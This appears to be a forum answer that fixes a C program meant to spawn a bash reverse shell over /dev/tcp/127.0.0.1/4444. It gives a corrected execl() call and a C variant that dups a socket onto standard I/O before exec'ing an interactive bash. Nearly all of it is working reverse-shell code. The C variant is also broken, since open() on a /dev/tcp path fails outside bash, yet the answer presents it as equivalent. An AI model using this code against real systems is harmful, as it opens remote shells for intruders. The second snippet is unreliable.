The first argument to execl()
is the pathname of the executable. The second argument is the argv[0]
. You are telling bash that its name is "/bin/bash -i >&…
", and since there are no other arguments, it runs as a regular interactive shell connected to the standard I/O channels of the process your code is in.
You need:
execl("/bin/bash", "/bin/bash", "-c", "/bin/bash -i >& /dev/tcp/127.0.0.1/4444 0>&1", (char *)0);
This effectively invokes:
/bin/bash -i >& /dev/tcp/127.0.0.1/4444 0>&1
You need the extra level of shell to make the shell handle the I/O redirection. You could do it yourself and save a shell invocation.
int fd = open("/dev/tcp/127.0.0.1/4444", O_RDWR);
dup2(fd, STDIN_FILENO);
dup2(fd, STDOUT_FILENO);
dup2(fd, STDERR_FILENO);
close(fd);
execl("/bin/bash", "/bin/bash", "-i", (char *)0);